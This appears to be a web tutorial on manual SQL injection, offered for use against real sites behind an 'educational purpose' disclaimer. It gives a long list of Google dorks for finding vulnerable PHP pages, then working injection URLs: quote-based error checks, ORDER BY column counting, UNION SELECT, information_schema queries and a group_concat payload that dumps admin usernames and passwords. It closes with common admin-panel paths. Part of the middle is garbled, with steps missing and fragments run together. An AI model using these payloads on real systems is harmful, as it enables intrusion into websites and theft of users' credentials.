Manual SQL Injection

NOTE: Hacking is a illegal activity so don't try on anyone. this tutorial is Only for educational purpose. If you want to use this tutorial for miscellaneous purpose please stop reading.  

Manual SQL Injection

Step 1: Finding Vulnerable Website:

find the Vulnerable websites using Google Dork list

Dorks: Some Examples:

inurl:index.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:pageid="inurl:index.php?catid=""inurl:news.php?catid=" "inurl:index.php?id=""inurl:news.php?id="inurl:index.php?id= inurl:trainers.php?id=  inurl:buy.php?category= inurl:article.php?ID=  inurl:play_old.php?id= inurl:declaration_more.php?decl_id=  inurl:pageid=

inurl:games.php?id=  inurl:page.php?file= inurl:newsDetail.php?id=  inurl:gallery.php?id=

inurl:article.php?id=  inurl:show.php?id=  inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id=  inurl:top10.php?cat= inurl:historialeer.php?num=

inurl:reagir.php?num=  inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id=

inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id=

inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id=

inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id=  inurl:sem.php3?id=

inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id=

inurl:show_an.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:opinions.php?id=

inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id=inurl:chappies.php?id= inurl:read.php?id= inurl:prod_detail.php?id= inurl:viewphoto.php?id=

inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id=

inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id=

inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID=

inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id=

inurl:fellows.php?id= inurl:downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id=

inurl:band_info.php?id= inurl:product.php?id= inurl:releases.php?id= inurl:ray.php?id=

inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail.php?id=

inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id=

inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurl:page.php?id=

inurl:shredder-categories.php?id= inurl:tradeCategory.php?id=

inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php?id=

inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id=

inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id=inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id=inurl:sql.php?id= inurl:aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id=

inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id=

inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id=

inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in=

inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID=

inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id=

inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt=

inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl:offer.php?idf= inurl:art.php?idm= inurl:title.php?id=

copy one of the above command and paste in the google search engine box.

Hit enter.

You can get list of web sites.

Note: if you like to hack particular website, then try this:

site: www.victimsite.com  dork_list_commands

for eg:

site: www.victimsite.com inurl:index.php?id=

Step 2: Checking the Vulnerability:

Now we should check the vulnerability of websites. In order to check the vulnerability ,add

the single quotes(‘) at the end of the url and hit enter. (No space between the number and single quotes)

For eg:

http://www.victimsite.com/index.php?id=2'

https://www.site.com/index.php?id=1'

And we Get Error . It Means That Site Is Vulnerable For SQL Injection. Here Some Other Ways To Check Website Vulnerbility.

Using Closed Bracket )

https://www.site.com/index.php?id=1)

Using Single Quote '

https://www.site.com/index.php?id=1'

Using Double Quote "

https://www.site.com/index.php?id=1"

Now Next Step Is To Count Total Number Of Columns .

First Check Comment Type to Balance Our Query.

Here Are Some Basic Comments .

https://www.site.com/index.php?id=1--

https://www.site.com/index.php?id=1--+

https://www.site.com/index.php?id=1-- -

https://www.site.com/index.php?id=1--+-

https://www.site.com/index.php?id=1%23

https://www.site.com/index.php?id=1;

After Balancing Our Query Lets Count Total Number Of Columns. We Can Count Columns Using Order By or Group By Statement .

If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable. If it showing any errors which is related to sql query,then it is vulnerable.

For eg:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

Step 3: Finding Number of columns:

Now we have found the website is vulnerable. Next step is to find the number of columns in the table. For that replace the single quotes(‘) with “order by n” statement.(leave one space between number and order by n statement) Change the n from 1,2,3,4,,5,6,…n. Until you get the error like “unknown column “.

For eg:

http://www.victimsite.com/index.php?id=2 order by 1

http://www.victimsite.com/index.php?id=2 order by 2

http://www.victimsite.com/index.php?id=2 order by 3

http://www.victimsite.com/index.php?id=2 order by 4

change the number until you get the error as “unknown column” if you get the error while trying the “x”th number, then no of column is “x-1″.

I mean:

http://www.victimsite.com/index.php?id=2 order by 1(noerror)

http://www.victimsite.com/index.php?id=2 order by 2(noerror)

http://www.victimsite.com/index.php?id=2 order by 3(noerror)

http://www.victimsite.com/index.php?id=2 order by 4(noerror)

http://www.victimsite.com/index.php?id=2 order by 5(noerror)

http://www.victimsite.com/index.php?id=2 order by 6(noerror)

http://www.victimsite.com/index.php?id=2 order by 7(noerror)

http://www.victimsite.com/index.php?id=2 order by 8(error)

so now x=8 , The number of column is x-1 i.e, 7. Sometime the above may not work. At the time add the “–” at the end of the statement.

For eg:

http://www.victimsite.com/index.php?id=2 order by 1—

Step 4: Displaying the Vulnerable columns:

Using “union select columns_sequence” we can find the vulnerable part of the table. Replace the “order by n” with this statement. And change the id value to negative(i mean id=-2, must change, but in some website may work without changing). Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:

if the number of columns is 7 ,then the query is as follow:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

It will show some numbers in the page(it must be less than ‘x’ value, i mean less than or equl to number of columns).

Like this:

information_schema.tables where table_schema=database()–” with“FROMinformation_schema.columnsWHEREtable_name=mysqlchar–

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and

replace mysqlchar with that .

Find MysqlChar() for Tablename:

First of all install the HackBar addon:

https://addons.mozilla.org/en-US/firefox/addon/3899/

Now

select sql->Mysql->MysqlChar()

 

This will open the small window ,enter the table name which you found. i am going to usethe admin table name.

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.

Copy and paste the code at the end of the url instead of the “mysqlchar”

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)–

Now it will show the list of columns.

Like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now replace the replace group_concat(column_name) with

group_concat(columnname,0x3a,anothercolumnname).

Column name should be replaced from the listed column name.

Another column name should be replace from the listed column name. Now replace the ” from information_schema.columns where table_name=CHAR(97, 100,109, 105, 110)” with the “from table_name”

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometime it will show the column is not found.

Then try another column names Now it will Username and passwords. If the website has members then jock-bot for you. You will have the list of usernames and password.

Some time you may have the email ids also.

Step 8: Finding the Admin Panel:

Just try with url like:

http://www.victimsite.com/admin.php

http://www.victimsite.com/admin/

http://www.victimsite.com/admin.html

http://www.victimsite.com:2082/

etc.

How to be Find Admin panel Click here 

Legal Disclaimer : This tutorial is completely for educational purpose only. For any misuse of this tutorial by any means the author will not be held responsible.  

If you have any queries Please comment my posts.